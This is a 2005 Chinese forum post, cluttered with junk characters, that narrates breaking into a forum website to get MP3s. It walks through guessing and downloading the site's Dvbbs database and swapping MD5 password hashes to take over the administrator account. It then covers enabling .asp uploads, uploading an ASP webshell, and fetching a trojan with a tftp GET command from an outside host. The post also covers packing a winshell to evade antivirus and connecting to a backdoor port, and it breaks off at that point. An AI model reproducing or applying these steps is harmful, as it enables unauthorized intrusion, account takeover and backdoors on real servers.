|
编者:文章题目很简单.内容却比题目有趣多了,建议各位看看
# |1 ]9 Y5 N! ~, R) z; a' r7 E: J作者:ALLEN QQ:515659
& V- k3 L" G# U, Q& {今天心情不好,写一篇文章玩玩吧,利用网站的配置错误配合serv-u取得管理员权限,简单一点就是通过asp木马配合serv-u取得管理员权限,哈哈哈,是不是很cool阿! 3 }, N5 _6 b' Z2 c
------------文章开始------------ / u5 i$ L. ]! y
为了找仓木麻衣的mp3(这个小姑娘的歌很好听阿),把半个互联网都搜完了(太夸张了把),就是找不到,苦然眼镜一亮,哈哈哈×××论坛,看来人气不错,也有mp3的下载地址,那就去看看吧 - z& G2 y0 A8 J5 s# r
晕~~~~,
: U5 v4 {# {( v y$ V" C论坛错误信息 1 ]4 k/ c+ f) z- M" C z
产生错误的可能原因: . j% f$ {. u. d$ g F Y% ~: z
您是否仔细阅读了帮助文件,可能您还没有登陆或者不具有使用当前功能的权限。
- w: F' v2 R0 f1 c7 f; [* N8 g' C还要注册阿,可是论坛由于种种原因又不让注册
4 ]$ B9 ~+ O0 X气的我差点吐血!
) w3 L2 J2 M) A1 o+ O& ]怎么办阿???唉,本想用溯雪破解几个密码。可是我们这个落后的地方上网贵,速度慢,有那个钱早就可以去买几张d版cd了,算了吧,想想别的办法把,打开我的xscan,随便扫了一下,服务器挺安全阿,只开了21,80,3389端口
7 i, |' M x" u' F, S& ?看来做了端口过滤
. ?! B* R6 ]4 j没什么可利用的漏洞怎么办,不要着急,他用的是动网论坛,先试着下载他的数据库试试吧 ' G, |7 h/ L+ o* J/ U/ }
手动的找了一些,都不行
1 d% \/ A/ O0 ^" o7 Z8 |我先猜一下数据库在哪个目录里面,如果猜对的话下载数据库的成功率就比较高了 1 e8 H: Q- L" n0 Q( R/ W6 Q& `5 ^
_blank>http://aaa.com/data
4 p4 ?+ G2 d& q5 K+ u" E" e_blank>http://aaa.com/database
& {, G! m7 R* [2 X: m_blank>http://aaa.com/db 5 }# U' ^$ K6 G! k( u8 W# B
HTTP 错误 404 - 找不到文件
' E. o" v# w. k$ J) O0 XInternet 信息服务
! g( `( I/ w4 Y/ r" }# N继续 3 \; W+ T3 J, k
_blank>http://aaa.com/mdb
: v2 E/ h0 ~ JHTTP 错误 403 - 禁止访问 $ f" m. p, k1 ]
Internet Explorer
, q3 a$ e( l/ H出现403错误就说明对方有这个目录,但是不允许浏览目录 + t9 F6 K( q$ {" Y& ]; z
想想看mdb这个目录会是干什么的??哈哈十有八九十存放数据库的目录!
" n2 n$ @; q& m$ y7 O, h把我以前些的添加的数据库地址文件载入xscan(专门下载数据库的地址),然后只扫描cgi漏洞 0 D. d1 h' Z/ ]
scaning.......,大概10分钟过去了 ( G8 u( h# a* M" D
扫描结果
! M% d$ \4 ?6 w( b/ v/mdb/lovemaik.asa [漏洞描述] V; |# ^8 I( |, L& B0 S
哈哈哈,成功的扫到了数据库,顺便告诉大家一个技巧, ( S: Y: C) x- y! z' ~2 B
把一些常用的数据库地址如data.mdb,database.asp等等添加到xscan的cgi数据库中,或者单独作一个数据库,你可以用一些字典来生成数据库地址,这样的成功率很高的!
' V6 j0 e2 S2 wxscan有一个好处就是可以直接扫域名,比如_blank>http://www.seeie.com
/ _1 ^! N: ^7 u7 U( U- g' u' ^4 ~$ N这样的话xscan就会帮你猜数据库地址
! ^- V7 Y) a: M& \* o_blank>http://www.seeie.com/mdb/data.asp & }2 \& q% o+ o8 V0 A7 n. j2 ?7 v
_blank>http://www.seeie.com/mdb/db.mdb
' f: i% o- w4 I: C b( O9 x. [9 N....... ' R# G+ }4 n4 W( Z- u2 F' b
好了,现在打开Net Transport(一种很爽的下载工具)把数据库down过来,用了50多分钟,终于下载完了
" o$ e* X! D: u g' O0 A在自己的机器上安装jmail和动网论坛,把下载的数据库覆盖新数据库并且把数据库扩展名改为.mdb,接着注册用户:allen,密码:123456 5 V. n i6 l4 r1 i
现在打开数据库,查看到我们刚才注册的用户allen的密码为49ba59abbe56e057(由于论坛使用md5不可逆算法加密,所以不能得到明文密码)
2 F# c- D$ @9 ]) d好的把这一串数据复制一下,然后找到管理员的名字,也就是查找userclass表中数据为管理员的名字,把他的密码改成49ba59abbe56e057,记住在改密码之前一定要把他的密码(经过MD5加密过的)复制到一个记事本里,好了,我们用管理员的名字登陆,密码就是123456,接着我们就去修改管理员的资料,把回答问题和答案改掉!把email换成自己的,接着把刚才注册的用户allen提升为管理员,退出,在用allen帐号登陆,把原来的管理员降成普通用户,可能有些人会问这样做是为什么,原因是动网论坛不允许通过email取回管理员的密码,接着在打开数据库把原来管理员的密码给恢复了,在打开论坛,忘记密码-回答问题-取回密码,哈哈哈,快打开你的信箱把,密码已经发到你信箱了(注意,你的系统最好装jmail等邮件发送组件,要不然就会发不了邮件的) 0 p4 G N! j+ \6 f& ^$ _4 J
现在我们拿到了论坛管理员的密码了, . z+ h, ]& }' E6 B# p
注意:以上步骤都是在本地操作的,其目的就是为了拿到论坛管理员密码!
. ?& e5 w- T+ i) i: f+ ?现在登陆那个论坛-进入管理页面-论坛版面管理 -随便选一个讨论区-在上传文件类型中加上.asp,呵呵 6 ]$ z9 I% Y, Q3 F, U" W: i, R
好了,进去这个讨论区发表帖子-上传文件,呵呵,把asp木马传上去
$ X8 S7 h2 ~0 |8 }; h6 E好了,可是这个文件被重命名了,唉,新亏手里还有一个免fso的木马,只有一个文件。传上去 7 J$ t/ g [$ s3 T( a
可惜这个木马不好用,还是自己的木马用着顺手,于是tftp -i ***.***.***.*** GET use.asp
: T/ Z; o1 |& p, N好了,成功了,接这运行木马***.com/bbs/use.asp?id=1 $ x# ~" Y. f+ J' X# o# J0 r
呵呵,服务器的东西清清楚楚的摆在我们面前了,上传一个winshell把 & D5 Z: F! i2 A* r2 M
靠,服务器有病毒防火墙,看看是nav的,算了,自己加个壳吧,这样可以逃过防火墙!
1 `* k% Y/ x& J继续,传上去并执行。。。。没反应! , a4 f2 f. }" f4 I x0 \, R
先telnet ip 8210(我喜欢用noika手机的型号做为端口,) | 
IP卡
狗仔卡
发表于 2005-1-23 13:28
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
